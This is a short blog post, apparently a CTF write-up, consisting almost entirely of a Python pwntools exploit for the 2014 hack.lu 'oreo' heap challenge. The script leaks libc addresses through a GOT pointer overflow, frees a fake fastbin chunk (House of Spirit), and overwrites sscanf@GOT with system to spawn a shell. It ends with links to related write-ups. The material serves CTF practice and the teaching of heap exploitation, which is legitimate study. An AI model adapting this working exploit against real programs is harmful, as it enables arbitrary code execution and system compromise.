House Of Spirit-2014_hack.lu_oreo

  • 会飞的鱼
  • 6 Minutes
  • December 9, 2018
from pwn import *

# Parse the challenge binary and its bundled libc first (symbol/GOT lookups
# below only need these), then spawn the target process.
elf = ELF("./oreo")
libc = ELF('./libc.so.6')
p = process('./oreo')
# context.log_level = 'debug'

def add(descrip, name):
    """Menu option 1: add a rifle.

    The binary prompts for the name before the description, so the lines
    are sent in that order. Nothing is length-checked here; the exploit
    relies on that for the over-long name payloads below.
    """
    for line in ('1', name, descrip):
        p.sendline(line)

def show_rifle():
    """Menu option 2: list the rifles, consuming output up to the first separator line."""
    p.sendline('2')
    separator = '===================================\n'
    p.recvuntil(separator)

def order():
    """Menu option 3: place the order.

    Step 2 of the script calls this right after planting the fake chunk;
    presumably this is the menu action that frees the stored rifles.
    """
    p.sendline('3')

def message(notice):
    """Menu option 4: leave a message (the `notice` text) with the order."""
    for line in ('4', notice):
        p.sendline(line)
# NOTE: this script appears to target Python 2 pwntools (str payloads are
# concatenated directly with p32() output, and the step markers are
# Python 2 print statements).

#print 'step 1. leak libc base'
# Name = 27 bytes of padding followed by the address of puts@GOT. The
# rifle listing then shows the 4 bytes stored at that address in its
# "Description" field; presumably the over-long name runs into the
# description pointer. Those 4 bytes are the resolved address of puts.
payload1 = 'a' * 27 + p32(elf.got['puts'])
add('a' * 25, payload1)
show_rifle()
p.recvuntil('===================================\n')
p.recvuntil('Description: ')
leaked_line = p.recvuntil('\n', drop=True)
puts_addr = u32(leaked_line[:4])
log.success('puts_addr: ' + hex(puts_addr))

# Symbol offsets come from the libc shipped with the challenge, so a
# different libc build would need different offsets.
libc_base = puts_addr - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search('/bin/sh'))
log.success('system_addr: ' + hex(system_addr))
log.success('binsh_addr: ' + hex(binsh_addr))


#print 'step 2. free fake chunk at 0x0804A2A8'
# 62 filler rifles; together with the one from step 1 and the one added
# just below, that makes 0x40 rifles in total. Per the linked writeups
# the rifle count doubles as the size field of the fake chunk at
# 0x0804a2a8 (House of Spirit) -- verify against the binary's layout.
for _ in range(1, 0x3f):
    add('a' * 25, 'a' * 27)

# Same overflow as step 1, but this time the pointer is aimed at the
# fake chunk so that the order (free) is performed on it.
payload2 = 'a' * 27 + p32(0x0804a2a8)
add('a' * 25, payload2)

# Message body: 0x20 zero bytes, then 0x40 and 0x50. Presumably these
# provide the size values the free() sanity checks expect around the
# fake chunk; exact placement depends on the binary -- see the writeups.
payload3 = '\x00' * 0x20 + p32(0x40) + p32(0x50)
message(payload3)
order()
p.recvuntil('Okay order submitted!\n')

#print 'step 3. get shell'
# After the fake chunk has been freed, the next allocation of that size
# presumably hands it back, so this rifle's description is taken as the
# address of sscanf@GOT ...
sscanf_got = elf.got['__isoc99_sscanf']
add(p32(sscanf_got), 'a')

# ... and the message write lands on that GOT slot, replacing sscanf with
# system. The following input line is then consumed by system().
message(p32(system_addr))
p.sendline('/bin/sh\0')

p.interactive()

链接:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/fastbin_attack/#2014-hacklu-oreo

链接:https://norw1nd.github.io/2018/08/27/2014-hack-lu-oreo/